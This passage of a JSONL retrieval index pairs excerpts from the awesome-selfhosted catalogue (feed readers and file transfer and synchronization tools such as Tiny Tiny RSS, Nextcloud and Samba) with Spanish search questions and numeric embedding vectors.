0.00067, 0.04147, 0.08408, -0.01805, -0.01059, -0.00936, 0.05329, 0.00967, 0.00476, -0.02256, 0.04933, 0.00393, 0.00429, -0.00118, 0.0036, 0.03814, -0.0243, 0.00019, -0.03524, -0.11476, 0.02265, -0.07458, -0.03296, 0.04419, -0.07117, 0.00255, -0.03211, 0.0905, 0.00897]} -{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: Stringer β€” Work-in-progress self-hosted, anti-social RSS reader [MIT, Ruby]. Tiny Tiny RSS β€” Web-based news feed (RSS/Atom) reader and aggregator [GPL-3.0, Docker/PHP]. TinyFeed β€” Generate a static HTML page from a collection of feeds with a simple CLI [MIT, Go/Docker]. Upvote RSS β€” Generate rich RSS feeds from Reddit, Hacker News, Lemmy, Mbin, and more [⚠, MIT, Docker/PHP]. Yarr β€” Yarr (yet another rss reader) is a web-based feed aggregator which can be used both as a desktop application and a personal self-hosted server [MIT, Go].", "indexar": "quΓ© programa sirve para leer feeds RSS en casa y que sea anti-social?", "v": [-0.05872, -0.01466, -0.03149, -0.12263, -0.02994, -0.11515, -0.10918, -0.11188, 0.03781, 0.0017, -0.18815, -0.14269, 0.06684, -0.16125, 0.06035, -0.05619, 0.07271, 0.07304, 0.07535, -0.00601, -0.03067, 0.01248, -0.09029, -0.05634, -0.0953, -0.0072, 0.15716, -0.00029, -0.07555, 0.08287, -0.00202, -0.01494, 0.02559, -0.01738, -0.1562, 0.13824, 0.03139, 0.01739, -0.07013, -0.04235, 0.02421, -0.01919, 0.01836, -0.0167, -0.04068, -0.01493, 0.04428, -0.03405, -0.05167, 0.02526, -0.08195, -0.00098, 0.01185, 0.10481, -0.0788, 0.0006, -0.08867, -0.22121, -0.14887, 0.09305, -0.1267, 0.06839, 0.01693, -0.07085, -0.01149, -0.08413, 0.01844, 0.10733, 0.01591, -0.03561, -0.08213, -0.02449, 0.02238, 0.01961, -0.05505, 0.05863, -0.04532, 0.09138, -0.01018, -0.01638, -0.01126, -0.09253, -0.08947, 0.02941, 0.10891, 0.01916, -0.01058, -0.06894, -0.03565, -0.06352, -0.02002, 0.15302, -0.04068, 0.05187, 0.0014, -0.03225, 0.08667, -0.01273, -0.02152, -0.04572, 0.00771, -0.18331, -0.11427, 0.04121, 0.00579, -0.05342, 0.03847, -0.04169, -0.0047, 0.02367, 0.01058, 0.01052, -0.0852, -0.03292, 0.05916, 0.07339, -0.10248, -0.05085, 0.02405, -0.05469, -0.05691, 0.06557, -0.0679, -0.01998, 0.00457, 0.03606, 0.0735, 0.03292, -0.0008, 0.07602, -0.04856, 0.01775, -0.05908, 0.0306, -0.00829, -0.09365, -0.01276, -0.05264, -0.06676, -0.08596, 0.01237, 0.12911, 0.04744, 0.00215, -0.06097, -0.01055, 0.00416, -0.02341, -0.09271, 0.06627, -0.07295, 0.03039, -0.03179, -0.01786, -0.04552, -0.07631, -0.024, -0.02986, -0.03806, 0.05939, -0.05688, 0.03574, -0.00033, -0.08264, -0.0239, -0.04053, 0.08072, 0.03023, 0.03249, 0.08746, -0.01414, 0.06436, 0.02751, -0.03753, 0.00145, -0.05586, 0.01516, -0.03768, 0.01606, 0.0184, -0.11102, 0.06336, 0.06256, 0.00325, 0.0024, -0.05696, -0.09905, 0.05194, -0.03318, -0.03421, -0.04762, -0.06652, -0.00595, -0.01219, 0.01696, 0.01017, -0.05565, -0.0514, 0.12642, -0.08594, -0.0704, 0.02266, 0.06439, 0.05956, 0.02068, 0.04613, 0.09998, -0.01429, 0.01335, 0.13608, 0.01775, -0.03228, 0.01916, 0.0816, -0.06374, -0.03599, 0.02122, -0.01088, 0.07967, 0.10468, 0.02074, 5e-05, 0.00045, -0.01226, 0.0193, -0.02841, 0.01499, -0.01483, 0.01574, 0.03935, 0.00202, -0.05542, 0.02455, 0.06145, 0.02204, -0.05052, -0.0146, 0.02409, 0.01041, -0.05203, -0.05229, 0.04408, 0.06438, 0.00569, -0.01195, -0.03512, -0.07503, 0.03368, 0.02675, 0.00921, -0.03686, -0.0135, 0.02062, -0.01712, 0.05299, 0.09217]} -{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: Stringer β€” Work-in-progress self-hosted, anti-social RSS reader [MIT, Ruby]. Tiny Tiny RSS β€” Web-based news feed (RSS/Atom) reader and aggregator [GPL-3.0, Docker/PHP]. TinyFeed β€” Generate a static HTML page from a collection of feeds with a simple CLI [MIT, Go/Docker]. Upvote RSS β€” Generate rich RSS feeds from Reddit, Hacker News, Lemmy, Mbin, and more [⚠, MIT, Docker/PHP]. Yarr β€” Yarr (yet another rss reader) is a web-based feed aggregator which can be used both as a desktop application and a personal self-hosted server [MIT, Go].", "indexar": "con quΓ© puedo generar una pΓ‘gina estΓ‘tica simple desde mis fuentes RSS?", "v": [-0.00947, 0.09544, 0.03917, -0.1143, -0.01709, -0.08132, -0.05167, -0.16275, -0.04896, 0.03536, -0.1494, -0.05326, -0.03102, 0.00804, 0.243, -0.0062, 0.08397, 0.0545, -0.02113, -0.05181, -0.10335, -0.20017, 0.00922, -0.11447, -0.09924, -0.07109, -0.011, -0.04925, -0.16497, -0.01696, 0.02778, 0.03965, -0.06576, 0.02668, -0.14784, 0.06494, 0.05136, 0.15711, 0.01634, -0.06501, -0.06279, -0.063, 0.06093, 0.04776, -0.02841, -0.00232, -0.01432, -0.05302, -0.02806, 0.10743, 0.01228, -0.02323, -0.11337, 0.03702, -0.12652, 0.01536, 0.1542, -0.24422, -0.03047, 0.0574, -0.02737, 0.11615, -0.07847, -0.13265, -0.11304, 0.01892, -0.05771, -0.04471, -0.04919, -0.06138, -0.04335, -0.02844, 0.01727, -0.06843, 0.08372, 0.03521, 0.00999, 0.01628, -0.01488, 0.18994, -0.02556, -0.00946, 0.0019, -0.06744, -0.02843, -1e-05, 0.06675, 0.03893, -0.06099, -0.0711, 0.02922, -0.05099, -0.02453, 0.07268, -0.11755, -0.0666, -0.06452, -0.02364, -0.02772, -0.09338, -0.12322, -0.03718, -0.05604, -0.03886, 0.10777, -0.08235, 0.06191, -0.03211, 0.00859, 0.02613, -0.04288, 0.01566, -0.04145, -0.0096, 0.0016, 0.09301, 0.05571, 0.00353, -0.10003, -0.0284, 0.02116, -0.01262, -0.07056, -0.01246, 0.00142, 0.05297, 0.06787, 0.03313, 0.02443, -0.01657, 0.04358, 0.01498, -0.01657, -0.04739, 0.08431, -0.06591, 0.01506, -0.03039, 0.05878, -0.07231, -0.01142, 0.07381, 0.00227, -0.00318, 0.02318, -0.07637, 0.00742, -0.04177, -0.15414, -0.02606, -0.02873, -0.10112, -0.0023, -0.05784, -0.09169, 0.02394, 0.00416, -0.01105, -0.03269, -0.01813, -0.00704, 0.08201, -0.02371, -0.07368, 0.02947, -0.0889, -0.09629, 0.0047, -0.06137, 0.08666, -0.02555, 0.03232, 0.01472, -0.08926, 0.04112, -0.00853, -0.07969, -0.05069, 0.04013, 0.04345, -0.04538, 0.01909, -0.05503, 0.02606, -0.03706, -0.06243, 0.118, 0.01439, -0.0041, 0.01055, 0.03222, -0.02929, -0.04527, -0.02916, 0.03714, -0.01303, 0.03704, 0.01962, 0.04261, -0.00688, 0.01409, -0.04085, 0.04941, 0.01546, 0.03256, -0.04474, -0.00751, -0.01367, -0.04158, 0.03762, 0.04212, 0.00699, -0.00572, -0.03725, -0.01117, 0.02708, -0.01876, -0.05187, 0.04269, -0.0346, 0.0722, 0.05642, 0.02131, -0.00649, 0.01329, -0.01283, 0.02521, -0.00577, 0.00578, 0.06686, -0.02492, -0.03976, 0.00787, -0.01776, 0.03642, -0.04457, -0.01093, 0.05875, -0.00464, -0.01209, -0.01711, -0.01085, -0.01174, -0.05159, -0.00604, -0.01079, -0.05471, -0.02457, -0.00354, -0.05385, -0.02524, -0.02831, 0.02273, -0.01681, 0.00764, -0.04608]} -{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: Stringer β€” Work-in-progress self-hosted, anti-social RSS reader [MIT, Ruby]. Tiny Tiny RSS β€” Web-based news feed (RSS/Atom) reader and aggregator [GPL-3.0, Docker/PHP]. TinyFeed β€” Generate a static HTML page from a collection of feeds with a simple CLI [MIT, Go/Docker]. Upvote RSS β€” Generate rich RSS feeds from Reddit, Hacker News, Lemmy, Mbin, and more [⚠, MIT, Docker/PHP]. Yarr β€” Yarr (yet another rss reader) is a web-based feed aggregator which can be used both as a desktop application and a personal self-hosted server [MIT, Go].", "indexar": "cuΓ‘l es una alternativa libre a los lectores de noticias web tradicionales?", "v": [0.10605, 0.0962, -0.03427, 0.04653, -0.01032, 0.00509, 0.06171, -0.0469, -0.06406, -0.11448, -0.03782, -0.1365, 0.01268, 0.00981, 0.08121, -0.08697, 0.06018, -0.0071, 0.18167, -0.06339, -0.10325, -0.05404, -0.1421, -0.06691, -0.0051, -0.22121, -0.00771, 0.00294, 0.00083, 0.13185, -0.04723, 0.01933, 0.03913, 0.03966, -0.0704, 0.08172, 0.10075, 0.11921, -0.09457, -0.09061, 0.05119, -0.11176, -0.07505, -0.03563, -0.02022, -0.00084, -0.17164, -0.03849, -0.08682, -0.02236, -0.04836, 0.01325, -0.02572, 0.02668, 0.02524, -0.01393, 0.1451, -0.05692, -0.06265, -0.07307, 0.01829, 0.16407, 0.08715, -0.04854, 0.03111, -0.0329, 0.00064, -0.0097, -0.04144, 0.06573, 0.07238, -0.01156, 0.03217, 0.01961, -0.07999, 0.07812, -0.07797, 0.04696, 0.00223, 0.03271, 0.11607, -0.083, 0.01355, 0.00605, 0.03011, -0.02394, 0.01428, -0.17431, -0.03381, -0.01307, 0.09529, 0.111, 0.02063, 0.09095, -0.02176, -0.13097, 0.04428, -0.02535, -0.04766, 0.09622, 0.03085, 0.05954, -0.00177, -0.03956, 0.05041, -0.13742, -0.06579, 0.02501, -0.03297, 0.02231, 0.02342, 0.03335, -0.04386, -0.002, -0.115, 0.05534, -0.05418, -5e-05, -0.00879, -0.02683, -0.0465, -0.0201, -0.03974, -0.0207, 0.03804, 0.07457, 0.03235, 0.02295, -0.07784, -0.0371, -0.00554, -0.04756, -0.01803, -0.00043, -0.10436, -0.01471, 0.09424, -0.02811, -0.02018, 0.01112, -0.02882, -0.03562, -0.07097, -0.01489, 0.07367, -0.12219, 0.07195, -0.03972, -0.14166, -0.02823, -0.15188, 0.02276, -0.05881, 0.07398, -0.009, -0.02627, -0.05631, -0.05916, -0.07649, 0.10337, -0.0501, -0.02229, 0.06368, 0.01638, -0.04075, -0.03355, -0.06583, -0.04627, 0.0325, -0.02966, -0.06019, 0.08822, -0.0272, -0.08825, 0.06567, -0.01455, -0.0845, -0.00044, 0.06216, -0.01149, -0.06142, 0.03324, -0.14557, 0.02641, -0.00329, -0.03831, 0.01215, -0.0165, 0.01989, 0.05014, -0.02144, 0.01516, -0.08841, -0.04767, 0.01744, -0.01972, -0.04092, -0.01245, 0.02939, -0.0437, -0.09642, -0.00323, 0.02887, -0.01017, -0.00546, 0.03393, -0.03008, 0.04033, -0.00837, 0.08637, 0.0208, -0.05282, 0.04636, -0.04635, -0.01821, -0.0265, 0.05628, -0.10872, -0.01061, 0.01274, 0.06427, -0.00056, 0.02981, 0.05797, -0.0013, 0.02956, 0.02753, 0.03212, -0.0084, 0.05529, -0.01168, 0.01197, -0.00906, 0.02516, 0.01546, 0.03025, 0.00252, 0.03437, -0.07324, 0.00397, 0.05599, 0.04795, -0.0433, 0.01854, -0.00609, -0.03094, -0.12435, 0.02605, -0.0562, -0.04026, -0.05265, 0.03856, 0.05233, -0.04762, 0.03067, -0.02915]} -{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: bewCloud β€” File sharing + sync, notes, and photos (alternative to Nextcloud and ownCloud's RSS reader) [AGPL-3.0, Docker]. Cloudreve β€” File management and sharing system, supports multiple storage providers [GPL-3.0, Docker/Go]. Git Annex β€” File synchronization between computers, servers, external drives [GPL-3.0, Haskell]. Kinto β€” Minimalist JSON storage service with synchronisation and sharing abilities [Apache-2.0, Python]. Nextcloud β€” Access and share your files, calendars, contacts, mail and [more](https://apps.nextcloud.com/) from any device, on your terms [AGPL-3.0, PHP/deb]. OpenCloud β€” File Sharing and Collaboration Platform [Apache-2.0, Docker/Go/Nodejs]. OpenSSH SFTP server β€” Secure File Transfer Program [BSD-2-Clause, C/deb]. ownCloud β€” All-in-one solution for saving, synchronizing, viewing, editing and sharing files, calendars, address books and more [AGPL-3.0, PHP/Docker/deb].", "indexar": "que alternativa libre a Nextcloud hay para compartir y sincronizar archivos?", "v": [-0.09515, -0.10241, -0.10307, -0.0881, -0.13394, -0.15267, -0.06157, 0.01998, -0.06262, -0.03347, -0.07027, -0.19448, 0.00085, 0.04172, 0.0691, -0.02913, 0.01467, -0.05926, 0.08554, 0.01485, -0.10311, 0.0392, -0.08929, -0.11582, -0.03755, -0.11389, -0.05041, 0.08174, -0.05895, -0.03027, -0.04646, -0.08698, 0.10125, 0.06363, 0.00197, 0.01839, 0.16937, 0.15007, -0.04396, -0.05702, -0.06036, 0.07718, -0.03763, 0.1425, -0.05106, -0.03493, -0.04115, 0.02422, 0.01943, 0.11098, -0.07033, -0.05054, -0.05609, 0.05711, 0.00267, 0.02725, -0.0109, -0.18427, -0.01107, -0.0655, -0.06574, 0.12469, -0.02396, -0.04004, -0.11851, 0.0979, -0.08954, 0.11346, -0.16844, 0.21586, 0.13061, 0.0223, 0.08191, -0.06425, -0.10912, 0.05881, 0.03922, -0.04942, -0.08171, 0.09206, 0.06362, 0.01003, 0.06531, -0.01629, -0.07052, -0.04584, 0.04037, 0.00872, 0.05821, 0.08763, 0.0176, 0.04614, 0.00764, 0.06046, 0.00392, -0.04346, -0.00145, 0.01563, -0.10461, -0.03165, 0.0608, 0.0299, -0.00599, -0.02823, -0.00992, 0.0613, -0.01382, 0.05896, -0.04103, 0.01112, 0.08174, 0.08544, 0.09441, 0.09886, -0.03235, -0.02083, 0.03288, 0.02124, 0.02852, 0.06228, 0.02177, -0.01899, -0.01127, -0.13519, 0.02896, 0.08073, 0.06538, 0.06536, -0.08224, 0.04524, 0.03239, -0.01448, -0.07311, -0.03574, -0.08609, -0.06498, 0.03961, -0.01264, -0.01734, -0.09008, -0.00122, -0.02635, -0.01909, 0.03786, 0.00179, -0.06229, 0.04226, -0.04882, 0.00667, -0.08427, -0.09041, -0.02838, -0.0839, -0.00344, -0.05198, 0.05099, -0.00845, -0.00335, -0.09697, 0.0126, -0.01515, -0.02342, -0.06653, 0.02155, -0.02543, -0.03814, 0.08753, -0.02134, -0.05882, -0.00376, 0.0493, 0.08302, 0.04744, -0.07294, 0.05091, 0.00926, 0.01821, -0.0635, 0.01651, -0.05107, -0.01228, -0.04828, -0.01271, 0.04183, 0.03758, -0.05172, 0.03563, 0.04166, -0.05851, 0.05939, -0.02261, -0.0466, -0.02522, -0.02196, -0.02736, -0.01226, 0.01377, -0.03605, -0.07259, 0.00291, -0.01955, -0.06474, -0.02523, 0.04097, -0.02554, -0.04227, -0.00569, 0.04369, 0.07364, -0.01824, -0.00064, 0.07286, 0.01703, -0.01658, 0.00776, 0.05654, 0.00083, 0.03174, 0.02721, -0.05445, 0.03361, 0.04169, -0.00927, 0.00297, 0.00938, 0.05609, -0.05933, 0.04382, -0.01631, -0.05865, -0.02287, 0.0218, 0.05765, 0.09294, 0.00094, -0.02465, -0.02982, 0.08524, 0.03817, 0.00907, -0.01778, 0.01536, 0.0243, -0.00026, -0.07363, 0.00744, -0.07162, -0.04028, -0.00358, 0.01729, 0.02537, 0.00602, -0.02435, 0.0703, -0.01486, 0.09139]} -{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: bewCloud β€” File sharing + sync, notes, and photos (alternative to Nextcloud and ownCloud's RSS reader) [AGPL-3.0, Docker]. Cloudreve β€” File management and sharing system, supports multiple storage providers [GPL-3.0, Docker/Go]. Git Annex β€” File synchronization between computers, servers, external drives [GPL-3.0, Haskell]. Kinto β€” Minimalist JSON storage service with synchronisation and sharing abilities [Apache-2.0, Python]. Nextcloud β€” Access and share your files, calendars, contacts, mail and [more](https://apps.nextcloud.com/) from any device, on your terms [AGPL-3.0, PHP/deb]. OpenCloud β€” File Sharing and Collaboration Platform [Apache-2.0, Docker/Go/Nodejs]. OpenSSH SFTP server β€” Secure File Transfer Program [BSD-2-Clause, C/deb]. ownCloud β€” All-in-one solution for saving, synchronizing, viewing, editing and sharing files, calendars, address books and more [AGPL-3.0, PHP/Docker/deb].", "indexar": "cual es un programa de transferencia segura de archivos que funcione entre mis computadoras?", "v": [0.08212, 0.01383, -0.09585, -0.14026, 0.0685, -0.25252, 0.01962, -0.08173, -0.17047, -0.11234, -0.0592, -0.08138, 0.02363, 0.01087, 0.05189, -0.02332, 0.10829, -0.04064, 0.11481, -0.00829, 0.0138, -0.04529, 0.05594, -0.09948, -0.08317, 0.03848, -0.006, 0.05092, -0.08755, -0.00329, 0.09835, 0.00638, 0.18266, -0.07332, 0.047, -0.00511, -0.04138, 0.09318, 0.05298, 0.04731, 0.06953, 0.02604, -0.06097, 0.01268, 0.06182, -0.08712, 0.10135, -0.05052, 0.09622, -0.07529, -0.08804, -0.04021, -0.06032, -0.0003, -0.04565, -0.04195, 0.02152, -0.1059, 0.09202, 0.06513, -0.0551, 0.04959, -0.01786, -0.05485, 0.01809, 0.01742, 0.00929, -0.08893, -0.15142, 0.11471, 0.03725, 0.11859, 0.00676, -0.01244, -0.02019, 0.02926, -0.04817, 0.00153, 0.05077, 0.00897, 0.00994, 0.00607, -0.00801, 0.08305, -0.10902, -0.1024, 0.02235, -0.03158, 0.00783, 0.02086, 0.02723, 0.02348, -0.021, 0.11969, 0.12224, -0.02963, 0.11267, 0.02098, -0.04334, -0.01319, 0.07052, 0.02881, -0.07581, 0.14062, -0.04798, 0.13935, 0.07356, 0.00401, 0.08111, -0.0911, 0.06078, 0.03951, -0.0341, 0.00041, -0.14445, 0.07306, -0.05614, -0.03188, 0.03708, -0.05573, -0.11644, 0.06397, 0.01012, 0.01538, 0.08374, 0.01016, -0.01424, 0.12514, -0.122, 0.01993, 0.07308, -0.04624, -0.07622, -0.01009, -0.09541, -0.03499, -0.01708, -0.04004, 0.01855, -0.11489, 0.07986, 0.07928, 0.012, 0.01203, 0.01006, 0.08359, 0.05868, -0.04076, -0.06588, -0.01678, -0.00905, 0.01475, -0.01285, 0.01456, -0.04121, 0.05197, -0.01147, -0.05607, -0.10892, 0.05356, -0.04622, 0.06716, 0.04316, -0.04024, -0.02572, -0.02401, -0.02244, 0.07062, 0.03401, 0.01736, -0.04674, 0.03382, 0.01249, -0.06273, -0.04318, 0.01297, -0.0817, -0.03469, 0.06758, -0.04643, -0.07998, 0.09264, 0.02291, -0.01699, -0.02843, -0.0069, -0.04621, 0.0723, -0.03015, 0.05454, 0.02924, -0.01909, -0.06017, -0.01443, -0.01724, -0.03595, -0.06394, -0.01102, 0.01564, -0.0395, -0.04022, -0.00923, -0.03711, 0.02482, 0.03844, 0.10338, -0.04374, -0.05698, 0.00615, 0.07148, 0.02468, -0.02512, 0.07826, -0.0023, -0.03673, -0.03719, -0.03508, -0.01117, 0.02555, 0.03979, 0.07309, -0.06038, 0.01813, 0.00043, -0.01687, -0.06575, 0.02859, 0.03434, 0.0247, -0.05733, -0.02215, 0.02144, 0.0037, -0.02491, 0.04237, 0.05984, -0.0229, -0.05242, -0.04029, -0.05864, -0.00971, 0.09644, -0.02413, -0.09548, -0.01454, 0.03793, -0.11393, -0.01894, 0.0123, -0.02991, -0.03741, 0.04155, -0.00766, -0.02411, 0.05285, -0.00533]} -{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: bewCloud β€” File sharing + sync, notes, and photos (alternative to Nextcloud and ownCloud's RSS reader) [AGPL-3.0, Docker]. Cloudreve β€” File management and sharing system, supports multiple storage providers [GPL-3.0, Docker/Go]. Git Annex β€” File synchronization between computers, servers, external drives [GPL-3.0, Haskell]. Kinto β€” Minimalist JSON storage service with synchronisation and sharing abilities [Apache-2.0, Python]. Nextcloud β€” Access and share your files, calendars, contacts, mail and [more](https://apps.nextcloud.com/) from any device, on your terms [AGPL-3.0, PHP/deb]. OpenCloud β€” File Sharing and Collaboration Platform [Apache-2.0, Docker/Go/Nodejs]. OpenSSH SFTP server β€” Secure File Transfer Program [BSD-2-Clause, C/deb]. ownCloud β€” All-in-one solution for saving, synchronizing, viewing, editing and sharing files, calendars, address books and more [AGPL-3.0, PHP/Docker/deb].", "indexar": "con que puedo montar una plataforma completa para sincronizar, editar y compartir documentos sin pagar licencias?", "v": [0.09608, 0.03588, -0.21356, -0.15369, 0.02439, -0.13221, 0.05358, -0.04757, -0.22339, -0.0979, -0.008, -0.13567, 0.13989, -0.12966, 0.07893, 0.07666, 0.02032, -0.10834, 0.01623, 0.00974, 0.02528, 0.00672, -0.00056, -0.10918, -0.01303, -0.02606, 0.06749, -0.175, -0.15451, 0.06531, -0.02472, 0.07185, 0.04225, 0.0633, 0.03237, -0.05109, 0.05971, 0.09403, 0.04514, -0.02037, -0.01335, 0.08888, -0.01464, 0.04366, -0.11694, -0.01088, -0.01221, 0.08467, 0.05549, -0.00408, 0.00892, -0.01489, -0.15521, 0.0028, -0.04331, -0.10699, 0.17844, -0.11113, 0.10476, -0.02553, -0.03196, 0.07703, 0.01717, 0.04279, -0.0901, 0.06109, 0.03653, 0.07357, -0.02901, 0.12058, -0.01238, 0.01196, 0.06235, -0.01627, -0.10069, -0.00973, -0.08088, -0.12812, 0.00169, 0.14777, 0.09574, 0.02158, -0.06952, 0.01377, -0.0424, -0.06196, -0.00722, -0.04991, 0.11426, 0.05166, 0.02569, 0.08331, 0.01792, 0.00609, 0.01599, -0.11231, 0.05319, 0.05051, -0.07154, -0.05512, -0.08156, 0.09248, -0.0188, -0.03675, -0.07644, 0.04671, 0.06483, -0.09626, -0.02545, 0.03573, 0.03081, 0.13369, -0.04217, 0.05288, -0.05349, -0.016, -0.02203, 0.06246, 0.00522, 0.03364, 0.03437, 0.00295, 0.05613, -0.05955, 0.12658, -0.0069, 0.01972, 0.19289, -0.0671, 0.00114, -0.01399, -0.03251, -0.0366, -0.0107, 0.03344, -0.01423, 0.00372, -0.03347, -0.08269, -0.05796, 0.03468, -0.01545, 0.00229, -0.02308, 0.04454, 0.03616, -0.04808, -0.08589, -0.07416, -0.04405, -0.02594, 0.02757, -0.02944, 0.02275, -0.10871, -0.00234, 0.04296, 0.02313, -0.04021, 0.03344, 0.04896, 0.07281, -0.02302, -0.00626, -0.0104, 0.02852, -0.03104, 0.02468, 0.01933, -0.01231, 0.04319, 0.0329, 0.06189, -0.06083, 0.10659, -0.02597, -0.04171, -0.01475, -0.00454, 0.01696, -0.08278, -0.01464, -0.03663, 0.00795, -0.01391, 0.01984, 0.06784, 0.01376, 0.01257, 0.02111, 0.00246, 0.01656, -0.00378, 0.00068, 0.03959, -0.02006, -0.06139, 0.0119, -0.01678, -0.02689, -0.04419, -0.00988, -0.0414, 0.00746, 0.04564, -0.06629, -0.01729, 0.07065, 0.02593, 0.00257, -0.08048, -0.01904, 0.00846, -0.07017, -0.08624, 0.00761, 0.01024, -0.03727, -0.04014, 0.00321, 0.06484, 0.03707, 0.01151, -0.01742, 0.07791, 0.00107, 0.05695, 0.04736, 0.02656, -0.0247, -0.01387, 0.05705, -0.03277, 0.00817, 0.04421, -0.00262, 0.00873, 0.01083, -0.04666, -0.0071, -0.0445, 0.03815, 0.03537, -0.02846, -0.05993, -0.03082, -0.05768, -0.0555, 0.00429, -0.0419, 0.01832, 0.04466, 0.07272, -0.00622, -0.00848, -0.04068]} -{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: Peergos β€” Secure and private space online where you can store, share and view your photos, videos, music and documents. Also includes a calendar, news feed, task lists, chat and email client [AGPL-3.0, Java]. Puter β€” Web-based operating system designed to be feature-rich, exceptionally fast, and highly extensible [AGPL-3.0, Nodejs/Docker]. Pydio β€” Turn any web server into a powerful file management system and an alternative to mainstream cloud storage providers [AGPL-3.0, Go]. Samba β€” Samba is the standard Windows interoperability suite of programs for Linux and Unix. It provides secure, stable and fast file and print services for all clients using the SMB/CIFS protocol [GPL-3.0, C]. Seafile β€” File hosting and sharing solution primary for teams and organizations [GPL-2.0/GPL-3.0/AGPL-3.0/Apache-2.0, C]. Sync-in β€” File storage, syncing, sharing, and collaboration with real-time editing, permission management, and desktop/CLI clients [AGPL-3.0, Nodejs/Docker].", "indexar": "que programa hay para compartir archivos y videos de forma privada en la nube?", "v": [-0.00685, -0.03029, -0.00786, -0.20158, -0.05521, -0.08313, -0.02964, -0.05092, -0.05161, -0.16894, -0.00869, -0.13949, 0.00808, 0.0004, -0.17801, -0.02784, 0.10837, -0.0742, 0.11599, 0.06156, -0.03358, 0.07805, -0.10664, -0.02652, -0.0703, -0.0593, 0.08569, 0.08351, -0.05477, 0.02332, -0.02211, -0.01334, 0.00661, -0.03515, 0.0315, 0.05469, 0.1145, 0.01884, -0.15778, 0.00646, -0.03969, 0.02622, -0.04036, 0.17716, 0.02813, -0.04355, -0.03777, -0.0191, 0.03178, -0.00961, -0.08859, 0.04539, 0.02571, 0.07182, -0.01954, -0.07753, -0.07291, -0.1562, -0.03885, 0.03223, -0.12117, 0.07061, -0.00653, -0.12249, -0.01906, 0.01992, 0.02243, 0.08599, -0.21071, 0.09073, 0.06947, 0.01404, -0.01022, 0.01746, -0.03115, 0.02445, -0.01342, -0.04685, -0.10911, 0.02538, -0.02514, 0.0592, 0.05548, 0.05667, -0.0711, -0.00223, 0.0359, 0.00633, -0.00817, 0.00726, -0.02603, 0.02127, 0.05012, 0.05602, -0.013, 0.02396, 0.09528, 0.11072, -0.0514, -0.02901, 0.06402, 0.0628, -0.01665, 0.07444, -0.03483, 0.12112, 0.06077, 0.01388, -0.03465, 0.04465, 0.07107, 0.05973, 0.02888, 0.09905, -0.05284, -0.03573, -0.0085, -0.07069, 0.00747, -0.00394, -0.03012, 0.00594, -0.09633, -0.06914, 0.07032, 0.01087, -0.10548, 0.1106, -0.16136, 0.09501, -0.06375, 0.03939, 0.01148, 0.03677, -0.00722, -0.05853, -0.04182, -0.02615, -0.00532, -0.09438, 0.08357, -0.0321, 0.02923, 0.02457, 0.05808, -0.03238, 0.03563, -0.06246, 0.00113, -0.03143, -0.04631, 0.04277, -0.13038, -0.07521, -0.12145, 0.03163, -0.00402, -0.03766, -0.12778, 0.02108, 0.03846, 0.06485, -0.12327, -0.07344, 0.03959, -0.05751, 0.03005, 0.03448, 0.03747, 0.08209, 0.01055, 0.02314, -0.05035, -0.10141, -0.0052, 0.07903, 0.03589, -0.13107, 0.0383, -0.04032, -0.04791, -0.00501, 0.0592, 0.11785, -0.02521, -0.05496, 0.0086, 0.07613, -0.04127, 0.07367, -0.02274, -0.05404, -0.03708, 0.02237, 0.03013, -0.06976, -0.11393, -0.0013, 0.00934, 0.02784, -0.04688, 0.00482, -0.05423, 0.03013, -0.02563, 0.0088, -0.02788, -0.01799, 0.10304, 0.02175, -0.00181, -0.00501, -0.01302, -0.05933, 0.03214, 0.04856, 0.01227, 0.04851, 0.0471, 0.00871, -0.02936, -0.00661, 0.03277, -0.0538, 0.01079, 0.0144, -0.03766, 0.07619, -0.02255, -0.01962, -0.03766, -0.03561, 0.0221, -0.04401, 0.03117, 0.01392, -0.01333, 0.00563, 0.00083, -0.07511, -0.05652, 0.05768, 0.01497, 0.01083, -0.09627, -0.01697, -0.05804, 0.03623, 0.05046, 0.00337, -0.00724, 0.03134, 0.01497, -0.01097, 0.01256, 0.05354]} -{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: Peergos β€” Secure and private space online where you can store, share and view your photos, videos, music and documents. Also includes a calendar, news feed, task lists, chat and email client [AGPL-3.0, Java]. Puter β€” Web-based operating system designed to be feature-rich, exceptionally fast, and highly 